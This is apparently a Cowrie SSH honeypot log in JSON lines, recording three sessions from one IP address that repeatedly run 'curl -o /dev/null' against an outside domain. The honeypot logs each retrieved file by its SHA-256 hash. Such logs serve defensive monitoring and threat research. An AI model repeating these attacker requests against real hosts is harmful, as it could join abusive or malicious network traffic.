{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.546281Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.548316Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.550338Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.551106Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.559493Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.560659Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.561263Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.563038Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.563837Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.627499Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.628652Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.635668Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.640723Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.642044Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.642882Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.646083Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.647907Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.648670Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.686744Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.687916Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.693779Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.695771Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.700621Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.704148Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.705951Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.707047Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.743040Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.744968Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.746589Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.747127Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.791390Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.795157Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.796634Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.797288Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.798849Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.799546Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.829955Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.832570Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.838553Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.839323Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.870249Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.875069Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.876311Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.877471Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.882084Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.885187Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.901978Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.903344Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.904598Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.909351Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.911172Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.911710Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.917134Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.917793Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.947874Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.952182Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.953018Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.958060Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.958723Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.960082Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.960538Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.992322Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.993124Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.996657Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.999402Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.000192Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.001796Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.002840Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.006583Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.036691Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.040527Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.041711Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.042484Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.073034Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.079216Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.079995Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.087336Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.089202Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.089964Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.110289Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
